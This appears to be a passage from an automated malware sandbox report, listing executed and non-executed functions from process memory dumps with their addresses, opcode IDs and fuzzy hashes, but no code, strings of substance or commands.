                                        • Instruction Fuzzy Hash: B9D09E13B0552E17597471BE1858B7BE5CF8AC94B27050176DE09C7641FD98CC0247F1
                                        Function 05379559 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e1177ce4dd36f9955b437187b86231c096b69f79db79734976c953b97293252
                                        • Instruction ID: 39ac48c4ef823ce0248881b2031e1573766bce0a516634b0d292f3c75db9a05f
                                        • Opcode Fuzzy Hash: 9e1177ce4dd36f9955b437187b86231c096b69f79db79734976c953b97293252
                                        • Instruction Fuzzy Hash: 4CD05B23F01529575A7475BD19487B6D5DBDFC41663050176DD05C7B40FD78CC0247E1
                                        Function 0537DF30 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 7eccc545041b638283c31d5891d19dc185db8bc42f49c1237ce1cc451ea492eb
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: 27E08635F00018978B18D5AAD4504D9FBAEDBCD220F04847ED90AA7740DA32591AC6E1
                                        Function 0537DE58 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ea9cb60ff7ecec1ba2dbd8c13e74b6126cc2f8a677cac1e00f73b92aa1871e6
                                        • Instruction ID: 4fd0a506eda5159fc5be166fe68880c45ae6f250c9f16d64d0baa6b2bd8e09e8
                                        • Opcode Fuzzy Hash: 7ea9cb60ff7ecec1ba2dbd8c13e74b6126cc2f8a677cac1e00f73b92aa1871e6
                                        • Instruction Fuzzy Hash: C5E0C235B00B18478622661EA81085FB7EBDFC5672300882EE00AC7700DE74EC0647D5
                                        Function 05378739 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cf6571ea56f481fe72d0b39f5827fa5d54be478b676d4671c0e07545d171875
                                        • Instruction ID: 992894d81ba056ae9dc2166291dfd1b95fec426ad3f946b8c730602dd3212a24
                                        • Opcode Fuzzy Hash: 8cf6571ea56f481fe72d0b39f5827fa5d54be478b676d4671c0e07545d171875
                                        • Instruction Fuzzy Hash: A3E08631E05089CFCF19FBA4EC5D5EE7F70EA15302B4001DDE85762852DA750547CB81
                                        Function 0537C998 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c70bf3227e2eee1166cde3bbe26dec07ff9cbd2709ab76af47c0f049594cddd3
                                        • Instruction ID: a0577ad0bbfe4c0b7f6431f887fca0034af68b74127956c2c7aa1f714a0275fd
                                        • Opcode Fuzzy Hash: c70bf3227e2eee1166cde3bbe26dec07ff9cbd2709ab76af47c0f049594cddd3
                                        • Instruction Fuzzy Hash: 18E0C2323052606F8351AB7CA918569BBE1EBDE25230840BFF109C7B81DA348C018BA5
                                        Function 05378800 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54e4285946085f3eb005cea61bd22db71914702c55e122a37ffc97836d6b2804
                                        • Instruction ID: 31fe3f2a0eb29538b491f590a0a9a295fe865a856d89984504032abf40b26cef
                                        • Opcode Fuzzy Hash: 54e4285946085f3eb005cea61bd22db71914702c55e122a37ffc97836d6b2804
                                        • Instruction Fuzzy Hash: 92E02630D042068FCB54EFB8D50446ABFF1EB59209B0442AEE9048BB01D2700842CF81
                                        Function 0537C9A8 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5a4316fad50907d2119a92ca5a59d7d21dfc0794875a77a2e8e1638c3524e9c
                                        • Instruction ID: e8eec575d96931e53867ac473b94ea145ec37b25ae870eb71b24a48281a26542
                                        • Opcode Fuzzy Hash: c5a4316fad50907d2119a92ca5a59d7d21dfc0794875a77a2e8e1638c3524e9c
                                        • Instruction Fuzzy Hash: 26D0A7323002207B4214775DB81955AB7D9D7CD562300003EF60EC3740DE219C0293F4
                                        Function 0537F62F Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb52a42ace87c265a23baa11c86dbd40981a5d6be2d62393340ca0074536e252
                                        • Instruction ID: af95e01c68229ad97466176136968913af88b17ac96d0aeb0941ed76b53a5216
                                        • Opcode Fuzzy Hash: cb52a42ace87c265a23baa11c86dbd40981a5d6be2d62393340ca0074536e252
                                        • Instruction Fuzzy Hash: 9AE012B0D0020D9F8780DFBCC9415ADFFF4EB48200F1085AAC908D3701E7315A128BD1
                                        Function 0537F630 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: 8cb51c491d5fe27990b8ac517d29fb067baa1f18547501370678b2549d43a489
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: B4D067B0D0420D9F8780EFADC94156EFBF4EB48204F6085AA8919E7311E7329A128BD5
                                        Function 0537791A Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d2a7a603091fab36a40d01fd5471bcd567eac671e485bb26f10b3d1e4a10eb6
                                        • Instruction ID: 4c2264df027f9f854ac3f5d221f7a474593a8b4064a159e31462f72ec22c5f62
                                        • Opcode Fuzzy Hash: 0d2a7a603091fab36a40d01fd5471bcd567eac671e485bb26f10b3d1e4a10eb6
                                        • Instruction Fuzzy Hash: 7CD05E3100E3CC8FCB665BB898A54143F25DF4310535608DEE0498F1A39519584ADB15
                                        Function 05378748 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ee75946c9fac41ab17e3b7c66cf7246ef3ef576fd4a2d1fac3ca7f8837de53a
                                        • Instruction ID: 8074e3378ab585565cf4b8cdc2e134046249b7818ca90e39bd8cd8305db27df5
                                        • Opcode Fuzzy Hash: 1ee75946c9fac41ab17e3b7c66cf7246ef3ef576fd4a2d1fac3ca7f8837de53a
                                        • Instruction Fuzzy Hash: EED06731C0410D8BCB18EBA4EC5A5BDBB74FA14302F4041ADE917A2992EA315A5BCAC5
                                        Function 05378810 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bab891b553d53ad284d10c6d7d75eb0b61acb469e342fa5bd9a87b6cce4a272b
                                        • Instruction ID: f02349bf71384372fc7fe630bb27f9ea03680b93caf472602d1483641479aa37
                                        • Opcode Fuzzy Hash: bab891b553d53ad284d10c6d7d75eb0b61acb469e342fa5bd9a87b6cce4a272b
                                        • Instruction Fuzzy Hash: 9BD05B30D0420E9FC754DFA4D84556EBBB5E745301F004159DD0593750E6705D01CFC1
                                        Function 05377E90 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f2cffc2550b8346002ae16aeedfc655aee7b11e7b719ee0b4d0a2ac735a660c
                                        • Instruction ID: d6ee0519ff023d7fcb10b46b60353181dd93b3a0447cb083c9c41ee29cb2f3ac
                                        • Opcode Fuzzy Hash: 7f2cffc2550b8346002ae16aeedfc655aee7b11e7b719ee0b4d0a2ac735a660c
                                        • Instruction Fuzzy Hash: 35C048A29192948EEF0396321CAB2292F719A93616B0B56C2D842DB063D9288807E756
                                        Function 05377928 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ad753f1a510d78c9cb0aa7697d4a0ca64e617aa560e589755c4e68e695f4e92
                                        • Instruction ID: 2391b75ffb82d601e9bcf8f7c453c4d25e70fbb8795199800c1f06acac4eb71f
                                        • Opcode Fuzzy Hash: 5ad753f1a510d78c9cb0aa7697d4a0ca64e617aa560e589755c4e68e695f4e92
                                        • Instruction Fuzzy Hash: ADB09231048B0C8FC2686F7AA448818772AAB4621538008ACE80E0A2928E36E885CE44

                                        Non-executed Functions

                                        Function 07CA2308 Relevance: 10.3, Strings: 8, Instructions: 310COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl$Jl$Jl$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-685953168
                                        • Opcode ID: dc6a1f2b22832ed158b0b343aca1dd9e2e68b990d9fb51be09bfb826952a6328
                                        • Instruction ID: b7e0040624e71ca929af07b027c293b896e44082fa735053bed37ec406891b22
                                        • Opcode Fuzzy Hash: dc6a1f2b22832ed158b0b343aca1dd9e2e68b990d9fb51be09bfb826952a6328
                                        • Instruction Fuzzy Hash: 07B119B1B0022BEFDB248F69C4457AAB7F5BFC9216F14807AD815CB241DB31DA41CBA1
                                        Function 07CA1EF8 Relevance: 8.9, Strings: 7, Instructions: 176COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 84l$84l$Jl$Jl$Jl$Jl$Jl
                                        • API String ID: 0-1347777847
                                        • Opcode ID: 7e704a265fe965bcdcb87d69f67f21807965c10ae5ea3aaa7daa2bc6340c6f85
                                        • Instruction ID: 7401ebe2eddab00d013457dff1e9991536bd149355d8dbc616e689b3ab6dc79a
                                        • Opcode Fuzzy Hash: 7e704a265fe965bcdcb87d69f67f21807965c10ae5ea3aaa7daa2bc6340c6f85
                                        • Instruction Fuzzy Hash: 065126B1B0026BEFD7244A598841767FBB2AFC5316F28C07BDA458F255DB32D942C3A1
                                        Function 07CA33D8 Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: $afl$,Sl$,Sl$Rl
                                        • API String ID: 0-3088662772
                                        • Opcode ID: 97a6dd0a3be35a4d1740d531ed4660ec354d05b89feca7b81a310383ac89e675
                                        • Instruction ID: d6bc5d50a2ff77b749b01b6d29cf340be38eb003815954e017f38ff2734e9c3d
                                        • Opcode Fuzzy Hash: 97a6dd0a3be35a4d1740d531ed4660ec354d05b89feca7b81a310383ac89e675
                                        • Instruction Fuzzy Hash: 84415BB1B00386AFCB219B3998257AABFF19FC6216F14847BD509CF641DA30D941C792